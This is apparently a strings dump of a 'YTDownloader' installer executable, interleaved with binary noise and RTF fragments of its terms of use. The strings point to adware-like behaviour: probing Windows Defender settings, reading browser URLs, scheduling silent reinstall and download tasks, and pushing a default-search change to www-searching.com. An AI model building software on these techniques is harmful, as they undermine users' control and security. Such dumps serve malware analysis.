MMMMMBB???.BB?.7??.7.7LL7.7ELLELL7ETAETTTTT

@@,,@,,,,

MMBB???B?.......777.?.LLLLLLLETT

,,@,,,*,,,*

.hsdy>

,,,,*,,***

,,,@@,**,,,

MBMBBBBBB??????.B??.7c.77.LELL7LEEEL7E

,,****,*

MBMB??BBB???????...??777..LLEL7LAEEcAAATT

,**,,****

B???...7.7.777LLLL7ELAAAAAATAA

BB?.??.....?..LLLELEAAcEAEET

    #    #

B??BBMBB???BB....7777L7.LAATTELE

111111111

11111111111

BBMB?BB????...777.LLLL7LLAET

BB?.?.BBB???...LL7.77LLEEEEELTTTT

RRVVw%%X

#  #1111

BB??..77.7777.777EAEELELET

1111111

11111111

B??BB??..?..7..7L..LLLL

B??B?.B?......?..7.LL7LL

B??.?......LLL..

BB.....77.7LLL..LLEE

MBB??????.7.77.777L

MMBMMB..????....777.LEEE

??7.7.LLLL7LETL

8888888

BB.BB?........L77L

BMMB?B?....777.7.7.EEL

BBB.?B.77.......ETEE

BB.BB........7LLETTT

88888888

B???BB..BB?..7LLLT

BB.??BB..BB..7777L

B???????BB.?...LLLL7

BMB..BB.7.ELLLL77L

BBB??BB.?.LLLL77.

888888888

MBB?....B...cLLLLLLT

___&_&&&

__&&____&

____&___&&

____&__&_&

BM?.BBB?....777L

&&____&__&&__&&____

_&_&&_&&

.njm4tyyxwwwwxyytm3k.

\mbrkBinSub0\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author udif}{\operator Edith}{\creatim\yr2013\mo10\dy22\hr16\min58}{\revtim\yr2014\mo8\dy24\hr14\min26}{\version5}{\edmins16}{\nofpages4}

{\nofwords2316}{\nofchars13206}{\nofcharsws15492}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1501\margr1502\margt1440\margb1440\gutter0\ltrsect

The following license and terms of use (jointly: "Terms of Use") govern your access and use of the YTDownloader.com website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and

ll Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, tools and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally b

ive websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of Use limit our liability and that we do not provide warranties for YTDownloader or contents. It also limits your remedies.}{\rtlch\fcs1

lely for your private and personal purposes and always in accordance with the Terms and Use and the applicable law. Any other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons

is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or otherwise act in a way that interferes with other users\rquote

verse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents or materials on or received via YTDownloader without our prior written consent. You also agree to not remove, obscure, or alter any copyrig

TDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update the YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exerc

\~}{\field{\*\fldinst {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 HYPERLINK "mailto:}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect

the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own discretion and at your own ri

\par }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid1449721\charrsid1449721 YTDownloader includes certain marks, graphics, logos, page headers,

, licensors, suppliers and their respective directors, employees, agents a}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid3632102 nd shareholders (jointly: the "}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

s to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warranties and liability regarding the accuracy, completeness, security, reliability, timelin

ss, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties, so the above exclusions in whole or in part may not apply to you in your country or j

nder applicable law, in no event shall the Goobzo parties be liable for any damage whatsoever including but not limited to any direct, indirect, consequential, special, exemplary, punitive or incidental damages (including but not limited to damages for lo

s of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, contract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointl

urisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your country or jurisdiction and in such case the aggregate liability of the Goobzo parties shall

responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses caused by such member.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

You may create links to this Site from other websites in as much as it is clear that we do not endorse you or your activity, business, products or services and that you and us are not affiliated in any way.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect\linex0\headery708\footery708\colsx708\endnhere\sectlinegrid360\sectdefaultcl\sectrsid8879180\sftnbj {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\sbasedon0 \snext17 \sunhideused \styrsid5573618 Normal (Web);}{\*\cs18 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \sbasedon10 \spriority0 \styrsid5573618 apple-converted-space;}{\*\cs19 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \ul\cf2

\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author Edith}{\operator Edith}{\creatim\yr2014\mo3\dy24\hr8\min26}{\revtim\yr2014\mo10\dy27\hr12}{\version22}{\edmins1585}{\nofpages3}{\nofwords2318}

{\nofchars13216}{\nofcharsws15503}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1800\margr1800\margt568\margb1440\gutter0\ltrsect

\b\f40\fs16\insrsid11944020\charrsid14186020 \line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid14186020 1. Acceptance of Terms of Use\line The following license and terms of use (jointly: "Terms of Use") go}{\rtlch\fcs1

website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and all Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, t

ols and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally binding agreement between you, ("you", "visitor" and/or "user"), and Goobzo Ltd. and its affiliates and subsidiaries

r or parts thereof at our sole discretion and without liability. The products and services described on YTDownloader (and their respective websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of U

ny other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or o

py, modify, adapt, distribute, transmit, translate, display or otherwise exploit YTDownloader and you shall not try to reverse engineer, reverse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents

ith or through the Site. We reserve all rights not expressly granted in and to the Site. We reserve the right to terminate your access to YTDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update th

YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exercise our right to modify or terminate access to the YTDownloader service. Unless explicitly stated otherwise, any new

[email protected]}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3606027 " }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3886136 {\*\datafield

0000a5ab0000}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid3606027\charrsid2648633 [email protected]}}}\sectd \ltrsect

looking statements made on the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own di

\f40\fs16\cf1\insrsid11944020\charrsid14186020 . Trademarks\line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid425254 YTDownloader includes certain mark

and personal use only with no warranties whatsoever. Goobzo, its affiliates, partners, licensors, suppliers and their respective directors, employees, agents and shareholders (jointly: the " Goobzo parties") do not assume any liability whatsoever and disc

loader and included services and contents, including, without limitation, warranties as to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warrant

es and liability regarding the accuracy, completeness, security, reliability, timeliness, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties,

, exemplary, punitive or incidental damages (including but not limited to damages for loss of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, co

tract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointly or separately, have been advised of the possibility of such damages or loss. Such limitation of liability shall also apply whether the damages arise from use, misuse

t of personal injury or death arising from the negligence of Goobzo. Some countries and jurisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your cou

While these limitations of liability provisions use the Goobzo parties definition, the responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses ca

\par 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid14186020 . Links to this Site\line You may create links to this Site from other websites in a

Failure or delay of Goobzo exercise any right, power or remedy under or to require or enforce strict performance by you of any provision of th

\ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 HYPERLINK "mailto:[email protected]" }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 {\*\datafield

0000a5ab00000066000100d9}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid11944020\charrsid413544 [email protected]}}}\sectd \ltrsect

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Top of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Bottom of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 Normal (Web);\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Acronym;

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Keyboard;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Preformatted;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Sample;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Typewriter;

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />

?/?6?<?_?

9":(:,:0:4:

<*=/=9=|=

3#3'3 3/333

9Ÿ:u:

5%5S5

8 8$8(8,8084888<8@8

5 5$5(5,5

4 4$4(4,404

: :(:0:8:

>4?8?<?@?

<$<,<4<<<

= =@=`=|=

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

Invalid parameter or key doesn't exist.

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.

%s %s Error Report

CrashSender.exe is not found in the specified path.

crashrpt_lang.ini

l%s\CrashRpt\UnsentCrashReports\%s_%s

Couldn't create crash report directory.

Couldn't set C   exception handlers for main execution thread.

Couldn't launch CrashSender.exe process.

%s-tmp

Local\CrashRptEvent_%s_2

The operation was cancelled by client.

Error launching CrashSender.exe

%s has stopped working

Invalid registry key or invalid destination file is specified.

HKEY_LOCAL_MACHINE\

HKEY_CURRENT_USER\

Empty subkey is not allowed.

The registry key coudn't be open.

Local\CrashRptEvent_%s

%s\%s_%s\%s

%u.%u.%u.%u

chrome.exe

iexplore.exe

firefox.exe

safari.exe

opera.exe

explorer.exe

chrome

firefox

opera

@Google Chrome

Chrome_WidgetWin_1

chrome://settings-frame/#syi516

ChromeGetUrl::Initialize ReRun

ChromeGetUrl Done

ChromeGetUrl::BuildChromeHandles found window class name: %s

ChromeGetUrl::BuildChromeHandles HWNDS: %s

ChromeGetUrl::BuildChromeHandles Could not find Chrome windows, exiting..

%d secs

Name - %s

Value - %s

https

URL: %s changed to: %s

Adding URL:

Adding URL: %s

@Firefox

FirefoxBrowserWindow Found button window, 0x%x

FirefoxBrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

@Opera

OperaBrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

SafariBrowserWindow Found browser window, 0x%x

ESOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

GetModule failed. Err=%d

OpenProcess failed. Err=%d

JCertGetNameString failed.

CryptDecodeObject failed with %x

CryptQueryObject failed with %x

CryptMsgGetParam failed with %x

Program Name : %s

Publisher Link : %s

MoreInfo Link : %s

CertFindCertificateInStore failed with %x

CBOT_Condition::IsToInstall Return %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Work] TID=%X

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

Your %s is almost ready for use.

Click YES on the next screen to allow %s to complete integration.

wevtapi.dll

%SystemRoot%\System32\Winevt\Logs\Application.evtx

Event / System[EventID = %d] /Provider[@Name='MsiInstaller']

EvtRender failed with %d

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

%ddd

SB_TASK_%d

CreateTask: Query IExecAction failed

RUNONCE_%d

PT%dS

d-d-dTd:d:d

PT%dH

; UnelevateExecutable: Initialize failed

UNELEVATE_%d

; UnelevateExecutable: CreateTask failed

; UnelevateExecutable: RegisterOnceTask failed

; UnelevateExecutable: Task is still not running after 30 seconds. Task state = %d

%d.%d.%d.%d

Windows NT 6.1

Install.log

@REGKEY

.ReturnCode

cr.exe

%%SBDATE%%

%%SID%%

%%SUB%%

%%FULL_SUB%%

GetXml - Magnet is empty: %s

&ver=%s&are=%s&qre=%s&avre=%s&kbd=%s&tz=%s&pp=%s

GetFile - Failed to connect (Err=%d): %s

GetFile - Failed to connect: %s

GetFile - Get Failed (Err=%d): %s

GetFile - Get Failed: %s

GetFile - Read data Failed (Err=%d): %s

GetFile - Read data failed: %s

Failed to create process file (%x).

Mtx%d

Windows NT 5.1

Windows NT 6.2

Windows NT 6.0

Windows NT 5.0

?prd=%s&aff=%s&ver=%s&rnd=%d&tss=%d&action=%s&actionparam=%s&usid=%s

/p.ashx

Sock_Ping : getaddrinfo error = %d

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko; SBUA) Chrome/28.0.1500.95 Safari/537.36

GET %s HTTP/1.1

Host: %s

User-Agent: %s

close failed with error: %d

/S /PING /Action=%s /ActionParams=%s /PingParams=%s

/S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

ScheduleDownload Initialize Failed: %s

ScheduleDownload CreateTask Failed: %s

Start time: %s. End time: %s.

ScheduleDownload RegisterDailyTask Failed: %s

ScheduleInstaller Initialize Failed: %s

ScheduleInstaller CreateTask Failed: %s

ScheduleInstaller RegisterDailyTask Failed: %s

DeleteScheduleDownload Initialize Failed: %s

DeleteScheduleDownload DeleteTask Failed: %s

\Installer\Install%s_%ld

ShellExecute:

Second shellExecute:

RunAsAdmin failed : shell execute failed

HKEY_LOCAL_MACHINE64

Windows Vista

Windows Server 2008

Windows 7

Windows 8

Windows Server 2008 R2

Web Server Edition

Windows Server 2003 R2,

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003,

Web Edition

Windows XP

Windows 2000

(build %d)

FWCMD

GetTimeZoneInformation failed error %d

CInstallerUtils::AccessRegistryKeyValue64Bit Error opening key

CInstallerUtils::AccessRegistryKeyValue64Bit Could not read registry value

SOFTWARE\Microsoft\Windows NT\CurrentVersion

d/d/%d d:d

%d seconds

SUCCESSKEY

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

REPORT

TSMtx%d

%s /SECONDSTAGE /Mutex=%s /PIXGUID=%s

Error creating shared memory. Err=%d

Error running file: %s

Timeout expired (%d)

Error opening mutex. Err=%d

Return code = %d

Error reading return code. Err=%d

dfb5uyoqjsg4c.cloudfront.net

d1cfk8e4o0c4u2.cloudfront.net

d1vw44q53d84jx.cloudfront.net

Kernel32.dll

Error %d

ACUrl:

ProxyUrl:

ProxyBypass:

Bkernel32.dll

HKEY_USERS

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

BRWURLS

CInstallMgr::Work, exception: %s

KEYBOARD

XML is incorrect. Xml size=%d. Xml= %s

XML is incorrect. Xml size=%d. Plain Xml= %s

XML %s

bxsdk32.dll

Failed to download bxsdk dll. Error=%d

MINVERURL

REPORT_PROG

/S /REPORT /NUM=%d /AFF=%s

PINGURL

Incorrect xml - No products Node. Xml size=%d

ALTURL

REGKEY

AFFREGKEY

OCSetupHlp.dll

OC_KEY

IMAGE_URL

Cur ver %s, min ver %s

/ENC /S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

%d of 1

%d of %d

CInstallMgr::ReportSize

Schedule report failed

SOFTWARE\Microsoft\Windows Defender\Real-Time Protection

SOFTWARE\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction

SOFTWARE\Microsoft\Windows Defender\Signature Updates

SignatureVersion: %s ; RealTimeDisabled %d DownloadDisabled %d RunningDisabled %d ; DefActionSevere %d DefActionHigh %d DefActionMedium %d DefActionLow %d

OpenCandy init failed. Error=%d. Dll path=%s

Failed to download OpenCandy dll. Error=%d

Waited %d seconds

%%successProd%%

%úiledProd%%

Install %s

Set and keep www-searching.com my default search and homepage

By clicking Install, you agree to the <a href="hXXp://VVV.ytdownloader.com/legal/privacy/">Privacy Policy</a> and <a href="hXXp://VVV.ytdownloader.com/legal/terms/">Terms of Service</a>

Link %s

Client for product key 1 loaded.

Client for product key 2 loaded.

Recommended by %s

<a href="%s" id="TOS %s">Terms of Service</a>

<a href="%s" id="Privacy %s">Privacy Policy</a>

Offer %d: Title: %s; Description: %s

Offer %d, Result %d

Exception CHttpDownload::GetNextRange for URL %s

CHttpDownload::Open handle %d to file %s

Failed to open file %s, error = %d

__ERROR CHttpDownload::Read failed for file %s

CHttpDownload::Repot Bytes %I64d ,Total %I64d, by Downloader %d

Range=%I64d RangeReadBytes=%I64d connection %d Error %x

RedownloadRange %s err = %d headers=%s

CHttpDownload::RedownloadRange for URL %s

%sid=%d_r=%lld_err=%d

CHttpDownload::ReportError for URL %s

CHttpDownload::GetNextRange for URL %s

Get Failed : connection %d err %s (0x%X)

CHttpDownload::DownloadNextRange for URL %s

CHttpDownload::Close handle %d to file %s

CHttpDownload::NOT Close handle %d to file %s

CHttpDownload::Work for URL %s

PRESUCCESSKEY

DOWNLOAD START: %s

Download in virtual mode product: %s

Download Failed to createCHttpDownload:

Download Failed to createCHttpDownload: %s

Download - Failed to connect: %s

Download - Get Failed: %s

Http Reply code = %d

Download Failed to create downloaders list: %s

CProductInstaller::Get for product: %s, exception: %s

CProductInstaller::GetNextRange - No Next Range for product %s

CProductInstaller::GetNextRange - product %s start=%I64d end=%I64d size=%I64d

CProductInstaller::Close for Product %s

DownloadMultiConnection:file %s exists on disk %s

DownloadOneConnection FromScheduler : %s

DownloadOneConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadOneConnection): err=%s (0x%X)

Success %s FileSize= %I64d

DownloadMultiConnection FromScheduler : %s

DownloadMultiConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadMultiConnection): err=%s (0x%X)

INSTALL START: %s

/aff=%s /rnd=%d

/rnd=%d

CProductInstaller::InstallProduct for Product %s

DOWNLOAD BYTES: %s NumOfBytes = %I64d

DOWNLOAD NOT COMPLETED: %s

Trying One Connection Fallback: %s

Download failed, error (%x), %s - Trying Multiple Connection Fallback

RunFromScheduler: Trying Main Connection Fallback: %s

Trying main URL in one Connection %s %s

Trying Alternative Connection Fallback: %s

Alternative Connection %s %s

Alternative Connection Failed: %s

Download failed, error (%x), %s %s

Download failed, error (%x), %s

CProductInstaller::OnDownloadNotCompleted for Product %s

OnDownloadCompleted: %s, exiting status %d

status %d, id %d, total bytes %I64d, file size %I64d, %s

DOWNLOAD END: %s %s

%s, %d

DOWNLOAD END: Not all completed %s

%s FileSize= %I64d

CProductInstaller::OnDownloadCompleted for Product %s

INSTALL BEGIN: %s

INSTALL END: %s

CProductInstaller::OnInstallCompleted for Product %s

Install failed, error: %s

%s: %s

CProductInstaller::OnInstallNotCompleted for Product %s

%s - %s

SkipInstall - %s

/S /SCHEDULE /MAG=%s /pn=%s /pixGuid=%s /sub=%s /Reason=%s

CProductInstaller::AddToScheduler for Product %s

CProductInstaller::RemoveFromScheduler for Product %s

RESUCCESSKEY

%s:%s

UI screen timeout - %s

CRandomCondition::IsToInstall value = %s

CRandomCondition::IsToInstall mode result = %d

%d:%d

CRandomCondition::IsToInstall Return %d

CCMDLINE

YTDi 1.0.0.1

1.0.0.1

CrashRpt YTDi 1.0.0.1 Error Report

/INSTALL /dir=%s /products=%s

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

WAdvapi32.dll

By clicking Next, you agree to install %s and agree to the <a id="TOS" href="%s">Terms of Service</a> and <a id="Privacy" href="%s">Privacy Policy</a>.

%s:%s;

RICHED20.DLL

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

D%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

<d/d/%d d:d:d::d 0x%X>

the %s <a href="%s">Terms</a> and <a href="%s">Privacy Policy</a>

@%s?e=%s

zvl=%s&

File open error %d. File=%s

File size is 0. File=%s

Buffer allocation error %d

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

c:\%original file name%.exe

2.8.0.999

%original file name%.exe_1944:

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

OtSSh

VQSSh

PSSSSSSh

t!SSh\

PSSSSh

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

dbghelp.dll

%Y-%m-%dT%H:%M:%SZ

1.3.6.1.4.1.311.2.1.12

Cannot put the trigger ID: %x

{X-hX-hX-XX-XXXXXX}

Host Name: %s

Domain Name: %s

DHCP scope name: %s

GetNetworkParams failed with error: %d

WinHttpGetIEProxyConfigForCurrentUser failed with the following error number:

ERROR_WINHTTP_INTERNAL_ERROR

AutoConfigURL (MyProxyConfig.lpszAutoConfigUrl) is:

AutoConfigURL (MyProxyConfig.lpszProxy) is:

AutoConfigURL (is:

550e832f-a497-4eb7-bb40-8cc856f6d152

RegCreateKeyTransactedW

RegOpenKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

C:\BUILDS\Build_STUB\Installer\Release_YTDK\YTDKi.pdb

GetProcessHeap

KERNEL32.dll

EnumThreadWindows

EnumChildWindows

MsgWaitForMultipleObjectsEx

GetKeyboardLayoutList

USER32.dll

WS2_32.dll

GDI32.dll

RegOpenKeyExW

RegEnumKeyW

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyW

RegNotifyChangeKeyValue

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

OLEACC.dll

COMCTL32.dll

PSAPI.DLL

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

VERSION.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

SHFileOperationW

RPCRT4.dll

HttpSendRequestExW

HttpSendRequestW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpOpenRequestW

HttpEndRequestW

WININET.dll

GetCPInfo

zcÁ

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

.?AVCHttpFileDownload@@

.?AVCHttpAsync@@

.?AVCHttpDownload@@

.?AVCHttp@@

222222222

55555.ccc

22222222

22222222222

2222222222

222222222222

))aaaaaaaaaaaaa555555.7.??.cccccccAAAAAAAAAAAAA

2222222

..ccc

5.77..Lc7cEEcc7AAATE

|444|44|4

||||4|444

MM.LJ

MMM)MMBMBMBB???BBB??..?....L7.LLLEEEEEATAT

CMIC.CF?

@@,,@@,@@@@

**,,,,@,,@@,,

MMMMMBB???.BB?.7??.7.7LL7.7ELLELL7ETAETTTTT

@@,,@,,,,

MMBB???B?.......777.?.LLLLLLLETT

,,@,,,*,,,*

.hsdy>

,,,,*,,***

,,,@@,**,,,

